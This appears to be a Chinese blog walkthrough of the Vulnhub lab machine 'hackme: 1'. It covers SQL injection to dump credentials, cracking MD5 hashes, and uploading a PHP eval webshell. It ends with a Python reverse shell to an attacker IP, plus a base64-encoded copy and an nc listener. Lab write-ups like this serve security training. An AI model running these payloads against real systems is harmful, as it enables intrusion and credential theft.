Vulnhub靶机练习:hackme 1

最新推荐文章于 2024-06-24 12:25:08 发布
最新推荐文章于 2024-06-24 12:25:08 发布
阅读量128 收藏
点赞数
分类专栏: Vulnhub靶机练习 文章标签: 网络安全 学习方法 Powered by 金山文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_63651176/article/details/128794029
版权

hackme: 1

0x01

开启80端口,按照描述,在web页面寻找可用信息

0x02

发现是一个登录页面,还可以注册账户,这里盲测一波SQL注入,没有发现,选择了注册一个账户进入里面看看是什么情况

直接点击search按钮可以显示下面这么多书籍,依据已经存在的书籍进行测试sql注入

发现存在sql注入,基于单引号

这里的sql注入测试过程
1.依据已经存在的数据测试,选择一个数据搜索,正常回显且只回显这一条
2.加双引号,发现没有任何回显
3.加" or "1"="1,还是没有任何回显
4.将双引号,换成单引号' or '1'='1,发现回显的是正常条目
所以存在sql注入,为单引号

0x03

通过得到的sql注入点获取信息

# 测试列数
order by 4 #
# 获取表名
select group_concat(table_name) from information_schema.tables where table_schema=database()
# 获取字段名
select group_concat(column_name) from information_schema.columns where table_name='users'
# 获取数据
union select 1,(select group_concat(concat(name,": "),pasword) from users ),3 #
'+payload+#

0x04

将获取到的数据去解密

http://www.nitrxgen.net/md5db/ + hash-string

一个一个在登录解密尝试,最后确定了superadmin:Uncrackable

登录之后发现存在一个上传点,经过几次上传发现可以上传任何文件

0x05

上传一个php小马

<?php eval($_POST[1]);?>

然后用蚁剑连接,查找信息

在这个目录发现了一个二进制文件

0x06

反弹shell,并去查看该二进制文件作用

python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('192.168.113.128',7777));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"
# hackbar执行:1=system(base64_decode("cHl0aG9uIC1jICJpbXBvcnQgb3Msc29ja2V0LHN1YnByb2Nlc3M7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgnMTkyLjE2OC4xMTMuMTI4Jyw3Nzc3KSk7b3MuZHVwMihzLmZpbGVubygpLDApO29zLmR1cDIocy5maWxlbm8oKSwxKTtvcy5kdXAyKHMuZmlsZW5vKCksMik7cD1zdWJwcm9jZXNzLmNhbGwoWycvYmluL2Jhc2gnLCctaSddKTsi"));
#kali执行 nc -lvp 7777

去home目录下查看刚刚哪个二进制文件的信息

END

WhiteCatNya
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
VulnHub-Chill-Hack 1 靶场渗透实验
qq_56724121的博客
04-27 542
VulnHub-Chill-Hack 1 靶场渗透实验 一、信息收集 1、收集靶机的ip nmap来扫描存活的主机 nmap -sn 192.168.226.0/24( -v表示显示过程) 根据扫描的结果,可以继续验证目标靶机的ip 确定目标靶机地址是192.168.226.131 2、根据得到的靶机ip,继续扫描靶机相关的服务开放情况 nmap -sC -sV 192.168.226.131 -p- --min-rate=2000 -n -vv -sC –...
Vulnhub靶机练习:Pinky‘s-Place v2
WhiteCatNya的博客
01-17 283
Pinky's-Place v2 web渗透栈溢出靶机练习
hackme 靶场复现
m0_68471358的博客
08-02 259
靶机下载地址:hackme: 1 ~ VulnHubhttps://www.vulnhub.com/entry/hackme-1,330/将靶机下载并导入到VMware虚拟机当中,开启hackme1靶场,并开启kali当作攻击机将两台虚拟机均设为桥接模式二.靶机渗透。
靶机渗透 hackme-1(详解,适合新手)
君莫hacker的博客
09-05 6021
靶机hackme-1的目录0x01靶机描述0x02环境搭建0x03靶机渗透一、 信息收集二、 漏洞挖掘SQL注入文件上传漏洞三、 漏洞利用反弹shell方法一:一句话木马,蚁剑连接反弹shell方法二:system命令执行四、 提权0x04实验总结 0x01靶机描述 靶机基本信息: 链接 https://www.vulnhub.com/entry/hackme-1,330/ 发布时间 18 Jul 2019 作者 x4bx54 难度 简单 靶机基本介绍: “hackme”是一个
Vulnhub靶机练习:Pinky‘s Palace v1
WhiteCatNya的博客
01-03 279
直接访问8080端口显示403,但31337端口的服务是http-proxy,所以尝试以这个端口为代理访问curl -i --proxy 192.168.56.101:31337 http://127.0.0.1:8080/成功访问,同样可以给浏览器挂代理进行访问然后目录爆破也可以使用其他工具。
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
Vulnhub靶机系列:Kioptrix: Level 1.2 (#3)
01-09
这次的靶机Vulnhub靶机:Kioptrix: Level 1.2 (#3) 文章目录靶机地址及相关描述靶机设置利用知识及工具信息收集并getshell提权总结 靶机地址及相关描述 https://www.vulnhub.com/entry/kioptrix-level-12-3,24/ ...
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
Vulnhub靶机渗透测试 Five-1靶机
12-07
Vulnhub靶机渗透测试 Five-1靶机
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8306
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
问题:第一次世界大战的起止时间是 #其他#学习方法#微信
2401_82769597的博客
06-24 302
问题:第一次世界大战的起止时间是。A.1913 ~1918 年。B.1913 ~1918 年。C.1914 ~1918 年。D.1914 ~1919 年。
源代码-QQ价值评估程序ASP爬虫 [缓存技术版].zip
07-01
源代码-QQ价值评估程序ASP爬虫 [缓存技术版].zip
2007-2021年 乡村旅游指标-最美乡村数、旅游示范县数、旅行社数、景区数、农家乐数.zip
07-01
乡村旅游也是促进乡村经济发展的有效途径。通过发展乡村旅游,可以带动乡村相关产业的发展,提高乡村居民的收入,促进乡村的经济发展和社会进步。此外,乡村旅游还能促进城乡交流,推动城乡统筹发展。 数据整理各个省地区乡村旅游相关指标包括从业人数、美丽乡村数量、乡村旅游示范县数量,传统村落数量、景区数量、旅游收入,旅客周转量数据​。 数据名称:乡村旅游指标-最美乡村数、旅游示范县数、旅行社数、景区数、农家乐数 城市、年份、星级饭店数/家、A 级旅游景区数量/个、旅行社数/家、旅游接待总人数/万人、旅游总收入/亿元、旅客周转量、GDP、当地从业人员、森林覆盖率、生活垃圾无害化处理率、PM2.5浓度、中国美丽休闲乡村数量、休闲农业与乡村旅游示范县(点)、传统村落数量
C语言入门教程及100例
07-01
c语言基础学习及实用基础案例,帮助掌握编码基础
elasticsearch下载配置及案例&项目源码
07-01
elasticsearch下载配置及案例&项目源码
a*搜索求解8数码问题prediction-maste笔记
最新发布
07-01
a*搜索求解8数码问题
wx249校园外卖平台设计与实现-ssm+vue+uniapp.zip(可运行源码+sql文件+文档)
07-01
本校园外卖平台有管理员,用户,商家。管理员功能有个人中心,用户管理,商家管理,菜品分类管理,菜品信息管理,购买菜品管理,订单信息管理,订单领取管理,系统管理。用户和商家都可以在微信小程序端注册登录,商家可以对菜品进行管理,查看到某个用户购买菜品,订单和订单领取信息。用户可以查看所有菜品,并且购买,查看订单等操作。因而具有一定的实用性。本站后台采用Java的SSM框架进行后台管理开发,可以在浏览器上登录进行后台数据方面的管理,MySQL作为本地数据库,微信小程序用到了微信开发者工具,充分保证系统的稳定性。系统具有界面清晰、操作简单,功能齐全的特点,使得校园外卖平台管理工作系统化、规范化。 管理员可以对用户信息进行添加,修改,删除,查询操作。 管理员可以对商家信息进行添加,修改,删除,查询操作。 管理员可以对商家发布的菜品信息查询和删除操作。 管理员可以对菜品分类信息进行添加,修改,删除,查询操作。
2024.6 卢瑞霖编程证书.zip
07-01
2024.6 卢瑞霖编程证书.zip
vulnhub靶机系列:
09-09
1. Kioptrix:这是一个非常受欢迎的系列,包含了多个不同难度级别的靶机。从初级到高级的挑战,覆盖了各种网络安全知识。 2. Metasploitable:这个系列模拟了一个容易受到攻击的系统,用于学习Metasploit框架和漏洞...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值